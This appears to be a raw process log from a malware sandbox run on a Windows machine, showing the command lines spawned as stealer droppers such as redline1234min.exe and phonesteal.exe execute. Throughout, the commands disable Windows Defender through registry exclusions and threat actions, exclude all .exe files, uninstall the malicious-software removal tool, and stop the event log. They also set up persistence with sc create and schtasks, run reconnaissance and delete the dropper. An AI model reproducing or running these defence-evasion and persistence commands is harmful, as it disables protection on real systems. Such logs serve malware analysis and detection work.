schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Roaming\configurationValue\olehpsp.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\olehpsp.exe"
C:\Users\Admin\AppData\Roaming\configurationValue\STAR.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\STAR.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Users\Admin\AppData\Local\Temp\1000558001\kiliqiuang.exe
"C:\Users\Admin\AppData\Local\Temp\1000558001\kiliqiuang.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\1000558001\kiliqiuang.exe
"C:\Users\Admin\AppData\Local\Temp\1000558001\kiliqiuang.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Users\Admin\AppData\Local\Temp\1000561001\redline1234min.exe
"C:\Users\Admin\AppData\Local\Temp\1000561001\redline1234min.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 8452 -ip 8452
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8452 -s 2476
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "FLWCUERA"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1000564041\do.ps1"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "FLWCUERA" binpath= "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe" start= "auto"
C:\Users\Admin\AppData\Local\Temp\1000565001\goldprimedfsdf.exe
"C:\Users\Admin\AppData\Local\Temp\1000565001\goldprimedfsdf.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1000561001\redline1234min.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "FLWCUERA"
C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\system32\conhost.exe
conhost.exe
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Users\Admin\AppData\Local\Temp\1000572001\judi1234.exe
"C:\Users\Admin\AppData\Local\Temp\1000572001\judi1234.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Users\Admin\AppData\Local\Temp\onefile_2268_133529879094912185\stub.exe
"C:\Users\Admin\AppData\Local\Temp\1000572001\judi1234.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AYihtnKUEzNvC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AYihtnKUEzNvC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KqXbavCVBAoU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KqXbavCVBAoU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YoIROqlkSylWiuqmRuR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YoIROqlkSylWiuqmRuR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hWvuMSnmtaUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hWvuMSnmtaUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qLISRvQaU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qLISRvQaU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\kFtOkElpwyMNPVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\kFtOkElpwyMNPVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\lTcZMbelPItKiDkvR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\lTcZMbelPItKiDkvR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HLfrKneGcZPtnWVS\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HLfrKneGcZPtnWVS\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "UTIXDCVF"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\1000573001\phonesteal.exe
"C:\Users\Admin\AppData\Local\Temp\1000573001\phonesteal.exe"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto"
C:\Users\Admin\AppData\Local\Temp\1000574001\InstallSetup3.exe
"C:\Users\Admin\AppData\Local\Temp\1000574001\InstallSetup3.exe"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "UTIXDCVF"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe
C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AYihtnKUEzNvC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AYihtnKUEzNvC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff26379758,0x7fff26379768,0x7fff26379778
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AYihtnKUEzNvC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KqXbavCVBAoU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KqXbavCVBAoU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YoIROqlkSylWiuqmRuR" /t REG_DWORD /d 0 /reg:32
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1648 --field-trial-handle=2180,i,6059891228756473429,2513094981029991665,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1856 --field-trial-handle=2180,i,6059891228756473429,2513094981029991665,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1864 --field-trial-handle=2180,i,6059891228756473429,2513094981029991665,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3036 --field-trial-handle=2180,i,6059891228756473429,2513094981029991665,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3056 --field-trial-handle=2180,i,6059891228756473429,2513094981029991665,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3844 --field-trial-handle=2180,i,6059891228756473429,2513094981029991665,131072 /prefetch:1
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YoIROqlkSylWiuqmRuR" /t REG_DWORD /d 0 /reg:64
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Users\Admin\AppData\Local\Temp\nsm9EB5.tmp
C:\Users\Admin\AppData\Local\Temp\nsm9EB5.tmp
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hWvuMSnmtaUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hWvuMSnmtaUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qLISRvQaU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qLISRvQaU" /t REG_DWORD /d 0 /reg:64
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.linkedin.com/login
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.0.275686909\1355031572" -parentBuildID 20221007134813 -prefsHandle 1584 -prefMapHandle 1576 -prefsLen 20804 -prefMapSize 233480 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5abd596c-eb87-4189-936b-7899e544fd2e} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 1748 24bc70e6b58 gpu
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff26379758,0x7fff26379768,0x7fff26379778
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\kFtOkElpwyMNPVVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 6292 -ip 6292
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6292 -s 1388
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\kFtOkElpwyMNPVVB /t REG_DWORD /d 0 /reg:64
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.1.2003993816\1855881379" -parentBuildID 20221007134813 -prefsHandle 2076 -prefMapHandle 2072 -prefsLen 20804 -prefMapSize 233480 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2d58bfe5-6307-4d33-a35f-fb503dc95c75} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 2108 24bc75e1f58 socket
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.2.655256079\1778261005" -childID 1 -isForBrowser -prefsHandle 2928 -prefMapHandle 2924 -prefsLen 22021 -prefMapSize 233480 -jsInitHandle 972 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f5d163a-1757-40d9-9cd0-b3bb3cd008b5} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 2940 24bca880558 tab
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.3.561617980\117726505" -childID 2 -isForBrowser -prefsHandle 3920 -prefMapHandle 3916 -prefsLen 26427 -prefMapSize 233480 -jsInitHandle 972 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f608c594-d01a-4cdf-a9ee-1e087ad73501} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 3468 24bb3f62b58 tab
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1904 --field-trial-handle=1620,i,8530759317711239256,3514417821878428945,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1748 --field-trial-handle=1620,i,8530759317711239256,3514417821878428945,131072 /prefetch:2
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.4.287277354\1800174919" -childID 3 -isForBrowser -prefsHandle 4900 -prefMapHandle 4888 -prefsLen 26486 -prefMapSize 233480 -jsInitHandle 972 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd4df618-05ae-4ff0-834e-39f6601cedb9} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 4908 24bcec42058 tab
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\lTcZMbelPItKiDkvR /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\lTcZMbelPItKiDkvR /t REG_DWORD /d 0 /reg:64
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.5.2009227957\796973654" -parentBuildID 20221007134813 -prefsHandle 5212 -prefMapHandle 5208 -prefsLen 26486 -prefMapSize 233480 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb1ae83d-5221-41d4-bb34-1b5e6e8f21aa} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 5244 24bcf1cae58 rdd
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.6.1883631940\1970643758" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 5300 -prefMapHandle 5244 -prefsLen 26486 -prefMapSize 233480 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f7bc680-cbb4-4054-a5a9-566ba81216bf} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 5392 24bcf1c7e58 utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.linkedin.com/login
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.9.1388435135\1378157438" -childID 6 -isForBrowser -prefsHandle 5888 -prefMapHandle 5892 -prefsLen 26486 -prefMapSize 233480 -jsInitHandle 972 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d3d5abc3-e937-429f-a294-f7ee2687c317} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 5880 24bcf1c9958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.8.1828702560\1670586747" -childID 5 -isForBrowser -prefsHandle 5696 -prefMapHandle 5700 -prefsLen 26486 -prefMapSize 233480 -jsInitHandle 972 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a440858-8b1c-4e2a-8303-06f8cfb47e9e} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 5688 24bcf1c8a58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
